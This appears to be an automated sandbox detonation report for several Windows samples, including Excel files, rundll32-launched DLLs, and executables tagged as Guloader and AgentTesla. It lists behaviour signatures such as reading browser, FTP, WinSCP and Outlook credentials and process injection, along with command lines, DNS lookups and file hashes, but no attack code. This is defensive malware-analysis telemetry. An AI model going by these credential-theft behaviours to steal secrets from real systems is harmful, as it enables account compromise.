N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\XSG8996380.xls"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 105.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/3792-5-0x00007FFA78C10000-0x00007FFA78C20000-memory.dmp

memory/3792-6-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-9-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-17-0x00007FFA76890000-0x00007FFA768A0000-memory.dmp

memory/3792-22-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-21-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-23-0x00007FFA76890000-0x00007FFA768A0000-memory.dmp

memory/3792-20-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-19-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-18-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-16-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-15-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-14-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-13-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-12-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-11-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-10-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-8-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-7-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-4-0x00007FFA78C10000-0x00007FFA78C20000-memory.dmp

memory/3792-3-0x00007FFA78C10000-0x00007FFA78C20000-memory.dmp

memory/3792-2-0x00007FFA78C10000-0x00007FFA78C20000-memory.dmp

memory/3792-1-0x00007FFA78C10000-0x00007FFA78C20000-memory.dmp

memory/3792-0-0x00007FFAB8C2D000-0x00007FFAB8C2E000-memory.dmp

memory/3792-47-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-46-0x00007FFAB8C2D000-0x00007FFAB8C2E000-memory.dmp

memory/3792-48-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-49-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 0eb5b1247d963e4d110d0c614b463f6c
SHA1 ba07bcc5e1e4ebdcf361b1311211c21231a3b0c8
SHA256 d54c96240493dbcaa2ffc9a4586ceac048adce2aee33001f791b6bfa02f46b1a
SHA512 92b5fc0a6864564acdd6cbdd6c33dfaa92081a8060ccd421491b408345223b9b2e8204d028bda679875e76a5241d4d47cf1a584c75bbb38c30e64d3f13d18fdf

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

147s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\00496083.xls"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\00496083.xls"

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 28.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 67.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

memory/904-5-0x00007FFC2F330000-0x00007FFC2F340000-memory.dmp

memory/904-4-0x00007FFC2F330000-0x00007FFC2F340000-memory.dmp

memory/904-12-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-11-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-14-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-13-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-10-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-9-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-15-0x00007FFC2D1D0000-0x00007FFC2D1E0000-memory.dmp

memory/904-16-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-8-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-7-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-17-0x00007FFC2D1D0000-0x00007FFC2D1E0000-memory.dmp

memory/904-18-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-6-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-3-0x00007FFC2F330000-0x00007FFC2F340000-memory.dmp

memory/904-2-0x00007FFC2F330000-0x00007FFC2F340000-memory.dmp

memory/904-1-0x00007FFC6F34D000-0x00007FFC6F34E000-memory.dmp

memory/904-0-0x00007FFC2F330000-0x00007FFC2F340000-memory.dmp

memory/904-34-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-35-0x00007FFC6F34D000-0x00007FFC6F34E000-memory.dmp

memory/904-36-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 685657fb7094a8866ed6f5e2af57c914
SHA1 cd68e6a7b50e91b41863b1cbb4227510d8899bbe
SHA256 ca42f861122e74fd6e5aba72eb91a303f1b3b21bb9251917a0e574fc22a051d0
SHA512 af36cfdbe692c588d7c362ac3c4b40fc7f6d6d18b5392a16b45e9330c4d09575e9343e4509f74ee234fb5065fe29c7515d5721d5db6fbcff33ded971ae2cb962

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4544 wrote to memory of 1420 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4544 wrote to memory of 1420 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4544 wrote to memory of 1420 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1420 -ip 1420

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 608

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 25.77.123.92.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\I055170_06975755.xls"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\I055170_06975755.xls"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 104.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 100.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 213.80.50.20.in-addr.arpa udp

Files

memory/2256-1-0x00007FF8DAE2D000-0x00007FF8DAE2E000-memory.dmp

memory/2256-0-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp

memory/2256-2-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp

memory/2256-5-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp

memory/2256-4-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp

memory/2256-3-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp

memory/2256-8-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-9-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-10-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-12-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-11-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-13-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp

memory/2256-7-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-14-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-16-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-18-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp

memory/2256-19-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-21-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-20-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-17-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-15-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-6-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-47-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-48-0x00007FF8DAE2D000-0x00007FF8DAE2E000-memory.dmp

memory/2256-49-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 7c52d81cb1d43b12fd2df4b1fef0efc6
SHA1 514243668197d913f3789e0020dbf75271579dbe
SHA256 ecdba0b3ff658beebd94f387d9b5338a63953e594a49868b6bf69ae34e1545ad
SHA512 804b81b574e8f68bf0a7425a0b554c49fde7fa712c61c6d8dddedecafb199bdb7d38b7a9ba645666a20d6f30f65e39100f25bd417560fe288a2f392d04bd5ccd

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240729-en

Max time kernel

60s

Max time network

18s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\XSG8996380.xls

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\XSG8996380.xls

Network

N/A

Files

memory/1172-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1172-1-0x000000007337D000-0x0000000073388000-memory.dmp

memory/1172-2-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-7-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-4-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-13-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-12-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-11-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-10-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-9-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-8-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-6-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-5-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-3-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-14-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-15-0x000000007337D000-0x0000000073388000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

152s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe"

Signatures

Guloader family

guloader

Guloader,Cloudeye

downloader guloader

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe

"C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 102.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 17.14.97.104.in-addr.arpa udp
US 8.8.8.8:53 249.194.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nsgA26B.tmp\Math.dll

MD5 85428cf1f140e5023f4c9d179b704702
SHA1 1b51213ddbaedfffb7e7f098f172f1d4e5c9efba
SHA256 8d9a23dd2004b68c0d2e64e6c6ad330d0c648bffe2b9f619a1e9760ef978207a
SHA512 dfe7f9f3030485caf30ec631424120030c3985df778993342a371bf1724fa84aa885b4e466c6f6b356d99cc24e564b9c702c7bcdd33052172e0794c2fdecce59

C:\Users\Admin\AppData\Local\Temp\nsgA26B.tmp\System.dll

MD5 cff85c549d536f651d4fb8387f1976f2
SHA1 d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e
SHA256 8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8
SHA512 531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88

memory/2720-15-0x0000000003490000-0x0000000003590000-memory.dmp

memory/2720-16-0x0000000003490000-0x0000000003590000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20241010-en

Max time kernel

120s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2860 -s 224

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

158s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Windows.System.Diagnostics.TraceReporting.PlatformDiagnosticActions.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2444 wrote to memory of 2808 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2444 wrote to memory of 2808 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2444 wrote to memory of 2808 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Windows.System.Diagnostics.TraceReporting.PlatformDiagnosticActions.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Windows.System.Diagnostics.TraceReporting.PlatformDiagnosticActions.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

140s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5068 set thread context of 3864 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"

C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 100.208.201.84.in-addr.arpa udp

Files

memory/5068-0-0x000000007466E000-0x000000007466F000-memory.dmp

memory/5068-1-0x00000000002D0000-0x00000000003A2000-memory.dmp

memory/5068-2-0x0000000074660000-0x0000000074E10000-memory.dmp

memory/5068-3-0x0000000004DE0000-0x0000000004DEE000-memory.dmp

memory/5068-4-0x0000000004F40000-0x0000000004FD2000-memory.dmp

memory/5068-5-0x000000007466E000-0x000000007466F000-memory.dmp

memory/5068-6-0x0000000074660000-0x0000000074E10000-memory.dmp

memory/5068-7-0x0000000005280000-0x000000000531C000-memory.dmp

memory/5068-8-0x0000000005650000-0x000000000570C000-memory.dmp

memory/5068-9-0x0000000005710000-0x000000000574C000-memory.dmp

memory/3864-10-0x0000000000400000-0x000000000043C000-memory.dmp

memory/3864-13-0x0000000074660000-0x0000000074E10000-memory.dmp

memory/5068-14-0x0000000074660000-0x0000000074E10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Consignment Document.pdf.exe.log

MD5 e50d61d6d5cec0d2c6b3fbf02b17af2d
SHA1 fcf43f96e7389c27ee201fb00b65db01ca2cee40
SHA256 a87cf2dbf70a59d3d347f9ca743b6ceb3c805b4714cf4fb963c18b9ca8ffd0a9
